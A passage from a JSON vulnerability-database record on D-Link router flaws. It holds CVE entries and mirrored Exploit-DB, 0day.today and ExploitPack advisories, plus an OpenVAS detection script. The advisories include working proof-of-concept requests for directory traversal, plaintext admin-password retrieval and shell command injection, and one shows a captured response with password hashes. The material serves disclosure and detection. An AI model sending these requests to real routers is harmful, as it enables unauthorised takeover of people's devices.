This allows for full control over the device internals.", "edition": 7, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-17T14:29:00", "title": "CVE-2018-10823", "type": "cve", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10823"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:d-link:dwr-512_firmware:2.02", "cpe:/o:d-link:dwr-111_firmware:1.01", "cpe:/o:d-link:dwr-912_firmware:2.02", "cpe:/o:d-link:dwr-116_firmware:1.06"], "id": "CVE-2018-10823", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-10823", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:d-link:dwr-912_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-111_firmware:1.01:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-512_firmware:2.02:*:*:*:*:*:*:*", "cpe:2.3:o:d-link:dwr-116_firmware:1.06:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:48", "description": "Directory traversal vulnerability in the web interface on the D-Link DWR-116 device with firmware before V1.05b09 allows remote attackers to read arbitrary files via a .. 
(dot dot) in a \"GET /uir/\" request.", "edition": 4, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-04-10T14:59:00", "title": "CVE-2017-6190", "type": "cve", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6190"], "modified": "2017-08-16T01:29:00", "cpe": ["cpe:/o:dlink:dwr-116_firmware:v1.01\\(eu\\)", "cpe:/o:dlink:dwr-116_firmware:v1.05\\(au\\)", "cpe:/o:dlink:dwr-116_firmware:v1.00\\(cp\\)b10"], "id": "CVE-2017-6190", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-6190", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:dlink:dwr-116_firmware:v1.05\\(au\\):*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dwr-116_firmware:v1.01\\(eu\\):*:*:*:*:*:*:*", "cpe:2.3:o:dlink:dwr-116_firmware:v1.00\\(cp\\)b10:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Directory Traversal", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Directory Traversal", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824", "CVE-2017-6190", "CVE-2018-10822"], 
"modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:487819B5F7D2057B581292BB94033613", "href": "", "sourceData": "Directory Traversal\nCVE: CVE-2018-10822\n\nCVSS v3: 8.6\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n\nDescription: Directory traversal vulnerability in the web interface on D-Link routers:\n\nDWR-116 through 1.06,\nDIR-140L through 1.02,\nDIR-640L through 1.02,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\n\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\n\nPoC:\n\n`$ curl http://routerip/uir//etc/passwd`\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\n\nThis vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. 
The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Plaintext Password", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Plaintext Password", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824", "CVE-2018-10822"], "modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:99C55C552E76F7F5F22B613B84A71628", "href": "", "sourceData": "## Password stored in plaintext\nCVE: CVE-2018-10824\n\nDescription:\n\nAn issue was discovered on D-Link routers:\n\nDWR-116 through 1.06,\nDIR-140L through 1.02,\nDIR-640L through 1.02,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware.\nNOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\n\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\n\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\n\n`$ curl http://routerip/uir//tmp/XXX/0`\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. 
By using the directory traversal vulnerability it is possible to read the file without authentication.", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link Routers - Command Injection", "edition": 1, "published": "2018-10-12T00:00:00", "title": "D-Link Routers - Command Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-12T00:00:00", "id": "EXPLOITPACK:74666E227460F5E33300C7E86CA29F21", "href": "", "sourceData": "## Shell command injection\nCVE: CVE-2018-10823\n\nCVSS v3: 9.1\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\n\nDescription: An issue was discovered on D-Link routers:\n\nDWR-116 through 1.06,\nDWR-512 through 2.02,\nDWR-712 through 2.02,\nDWR-912 through 2.02,\nDWR-921 through 2.02,\nDWR-111 through 1.01,\nand probably others with the same type of firmware.\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. 
This allows for full control over the device internals.\n\nPoC:\n\nLogin to the router.\nRequest the following URL after login:\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\nSee the passwd file contents in the response.", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:11", "description": "\nD-Link DWR-116 DWR-116A1 - Arbitrary File Download", "edition": 1, "published": "2017-04-07T00:00:00", "title": "D-Link DWR-116 DWR-116A1 - Arbitrary File Download", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "EXPLOITPACK:8AB3A02A28DDB5D882D234C411704FB7", "href": "", "sourceData": "# Title: D-Link DWR-116 Arbitrary File Download\n# Vendor: D-Link (www.dlink.com)\n# Affected model(s): DWR-116 / DWR-116A1\n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)\n# CVE: CVE-2017-6190\n# Date: 04.07.2016\n# Author: Patryk Bogdan (@patryk_bogdan)\n\nDescription:\nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability\nwhich leads to unathorized file download from device filesystem.\n\n\nPoC:\n\nHTTP Request:\nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1\nHost: 192.168.2.1\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\nConnection: close\n\nHTTP Response:\nHTTP/1.0 200 OK\nContent-Type: application/x-none\nCache-Control: max-age=60\nConnection: close\n\nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash\nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin\nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin\n\n\nFix:\nUpdate device to the new firmware (V1.05b09)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2020-05-12T16:30:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-6190"], "description": "The host is a 
D-Link (DWR) device\n and is prone to a directory traversal vulnerability.", "modified": "2020-05-08T00:00:00", "published": "2018-11-26T00:00:00", "id": "OPENVAS:1361412562310108486", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108486", "type": "openvas", "title": "D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE_PREFIX = \"cpe:/o:d-link\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108486\");\n script_version(\"2020-05-08T08:34:44+0000\");\n script_cve_id(\"CVE-2017-6190\");\n script_bugtraq_id(97620);\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-05-08 08:34:44 +0000 (Fri, 08 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-11-26 13:53:11 +0100 (Mon, 26 Nov 2018)\");\n script_name(\"D-Link DWR Devices 'CVE-2017-6190' Directory Traversal Vulnerability\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_dlink_dsl_detect.nasl\", \"gb_dlink_dap_detect.nasl\", \"gb_dlink_dir_detect.nasl\", \"gb_dlink_dwr_detect.nasl\");\n script_mandatory_keys(\"Host/is_dlink_device\"); # nb: Experiences in the past have shown that various different devices might be affected\n script_require_ports(\"Services/www\", 80);\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/41840/\");\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/97620\");\n script_xref(name:\"URL\", value:\"https://cxsecurity.com/blad/WLB-2017040033\");\n\n script_tag(name:\"summary\", value:\"The host is a D-Link (DWR) device\n and is prone to a directory traversal vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted HTTP GET request\n and check whether it is possible to read a file on the filesystem.\");\n\n 
script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to read arbitrary files on the target system.\");\n\n script_tag(name:\"affected\", value:\"D-Link DWR-116 devices with firmware version\n before V1.05b09. Other devices, models or versions might be also affected.\");\n\n script_tag(name:\"solution\", value:\"Update to firmware version V1.05b09 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\n\nif( ! infos = get_app_port_from_cpe_prefix( cpe:CPE_PREFIX, service:\"www\" ) )\n exit( 0 );\n\nport = infos[\"port\"];\nCPE = infos[\"cpe\"];\n\nfiles = traversal_files( \"linux\" );\n\nif( ! dir = get_app_location( cpe:CPE, port:port ) )\n exit( 0 );\n\nif( dir == \"/\" )\n dir = \"\";\n\nforeach pattern( keys( files ) ) {\n\n file = files[pattern];\n url = dir + \"/uir/\" + crap( data:\"../\", length:3*16 ) + file;\n\n if( http_vuln_check( port:port, url:url, pattern:pattern, check_header:TRUE ) ) {\n report = http_report_vuln_url( port:port, url:url );\n security_message( port:port, data:report );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "zdt": [{"lastseen": "2018-10-25T14:44:30", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Directory Traversal Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10822"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31401", "href": "https://0day.today/exploit/description/31401", "sourceData": "Directory Traversal\r\nCVE: CVE-2018-10822\r\n \r\nCVSS v3: 8.6\r\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\r\n \r\nDescription: Directory traversal vulnerability in the web interface on 
D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware\r\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\r\n \r\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\r\n \r\nPoC:\r\n \r\n`$ curl http://routerip/uir//etc/passwd`\r\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\r\n \r\nThis vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31401"}, {"lastseen": "2018-10-25T14:44:47", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Plaintext Password Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31400", "href": "https://0day.today/exploit/description/31400", "sourceData": "## Password stored in plaintext\r\nCVE: CVE-2018-10824\r\n \r\nDescription:\r\n \r\nAn issue was discovered on D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nNOTE: I have 
changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\r\n \r\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\r\n \r\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\r\n \r\n`$ curl http://routerip/uir//tmp/XXX/0`\r\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. By using the directory traversal vulnerability it is possible to read the file without authentication.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31400"}, {"lastseen": "2018-10-25T14:46:05", "description": "Exploit for hardware platform in category web applications", "edition": 1, "published": "2018-10-25T00:00:00", "title": "D-Link Routers - Command Injection Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-25T00:00:00", "id": "1337DAY-ID-31402", "href": "https://0day.today/exploit/description/31402", "sourceData": "## Shell command injection\r\nCVE: CVE-2018-10823\r\n \r\nCVSS v3: 9.1\r\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\r\n \r\nDescription: An issue was discovered on D-Link routers:\r\n \r\nDWR-116 through 1.06,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. 
This allows for full control over the device internals.\r\n \r\nPoC:\r\n \r\nLogin to the router.\r\nRequest the following URL after login:\r\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\r\nSee the passwd file contents in the response.\n\n# 0day.today [2018-10-25] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31402"}], "exploitdb": [{"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Directory Traversal", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10822"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45678", "href": "https://www.exploit-db.com/exploits/45678", "sourceData": "Directory Traversal\r\nCVE: CVE-2018-10822\r\n\r\nCVSS v3: 8.6\r\nAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\r\n\r\nDescription: Directory traversal vulnerability in the web interface on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware\r\nallows remote attackers to read arbitrary files via a /.. or // after \u201cGET /uir\u201d in an HTTP request.\r\n\r\nNOTE: this vulnerability exists because of an incorrect fix for CVE-2017-6190.\r\n\r\nPoC:\r\n\r\n`$ curl http://routerip/uir//etc/passwd`\r\nThe vulnerability can be used retrieve administrative password using the other disclosed vulnerability - CVE-2018-10824.\r\n\r\nThis vulnerability was reported previously by Patryk Bogdan in CVE-2017-6190 but he reported it is fixed in certain release but unfortunately it is still present in even newer releases. 
The vulnerability is also present in other D-Link routers and can be exploited not only (as the original author stated) by double dot but also absolutely using double slash.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45678"}, {"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Plaintext Password", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10824"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45677", "href": "https://www.exploit-db.com/exploits/45677", "sourceData": "## Password stored in plaintext\r\nCVE: CVE-2018-10824\r\n\r\nDescription:\r\n\r\nAn issue was discovered on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDIR-140L through 1.02,\r\nDIR-640L through 1.02,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nNOTE: I have changed the filename in description to XXX because the vendor leaves some EOL routers unpatched and the attack is too simple\r\n\r\nThe administrative password is stored in plaintext in the /tmp/XXX/0 file. An attacker having a directory traversal (or LFI) can easily get full router access.\r\n\r\nPoC using the directory traversal vulnerability disclosed above - CVE-2018-10822\r\n\r\n`$ curl http://routerip/uir//tmp/XXX/0`\r\nThis command returns a binary config file which contains admin username and password as well as many other router configuration settings. 
By using the directory traversal vulnerability it is possible to read the file without authentication.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45677"}, {"lastseen": "2018-11-30T12:31:36", "description": "", "published": "2018-10-12T00:00:00", "type": "exploitdb", "title": "D-Link Routers - Command Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2018-10823"], "modified": "2018-10-12T00:00:00", "id": "EDB-ID:45676", "href": "https://www.exploit-db.com/exploits/45676", "sourceData": "## Shell command injection\r\nCVE: CVE-2018-10823\r\n\r\nCVSS v3: 9.1\r\nAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H\r\n\r\nDescription: An issue was discovered on D-Link routers:\r\n\r\nDWR-116 through 1.06,\r\nDWR-512 through 2.02,\r\nDWR-712 through 2.02,\r\nDWR-912 through 2.02,\r\nDWR-921 through 2.02,\r\nDWR-111 through 1.01,\r\nand probably others with the same type of firmware.\r\nAn authenticated attacker may execute arbitrary code by injecting the shell command into the chkisg.htm page Sip parameter. 
This allows for full control over the device internals.\r\n\r\nPoC:\r\n\r\nLogin to the router.\r\nRequest the following URL after login:\r\n`$ curl http://routerip/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd`\r\nSee the passwd file contents in the response.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/45676"}, {"lastseen": "2018-11-30T12:32:48", "description": "", "published": "2017-04-07T00:00:00", "type": "exploitdb", "title": "D-Link DWR-116 / DWR-116A1 - Arbitrary File Download", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-6190"], "modified": "2017-04-07T00:00:00", "id": "EDB-ID:41840", "href": "https://www.exploit-db.com/exploits/41840", "sourceData": "# Title: D-Link DWR-116 Arbitrary File Download\r\n# Vendor: D-Link (www.dlink.com)\r\n# Affected model(s): DWR-116 / DWR-116A1\r\n# Tested on: V1.01(EU), V1.00(CP)b10, V1.05(AU)\r\n# CVE: CVE-2017-6190\r\n# Date: 04.07.2016\r\n# Author: Patryk Bogdan (@patryk_bogdan)\r\n\r\nDescription:\r\nD-Link DWR-116 with firmware before V1.05b09 suffers from vulnerability\r\nwhich leads to unathorized file download from device filesystem.\r\n\r\n\r\nPoC:\r\n\r\nHTTP Request:\r\nGET /uir/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1\r\nHost: 192.168.2.1\r\nAccept: */*\r\nAccept-Language: en\r\nUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)\r\nConnection: close\r\n\r\nHTTP Response:\r\nHTTP/1.0 200 OK\r\nContent-Type: application/x-none\r\nCache-Control: max-age=60\r\nConnection: close\r\n\r\nroot:$1$$taUxCLWfe3rCh2ylnFWJ41:0:0:root:/root:/bin/ash\r\nnobody:$1$$qRPK7m23GJusamGpoGLby/:99:99:nobody:/var/usb:/sbin/nologin\r\nftp:$1$$qRPK7m23GJusamGpoGLby/:14:50:FTP USER:/var/usb:/sbin/nologin\r\n\r\n\r\nFix:\r\nUpdate device to the new firmware (V1.05b09)", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": 
"https://www.exploit-db.com/download/41840"}]}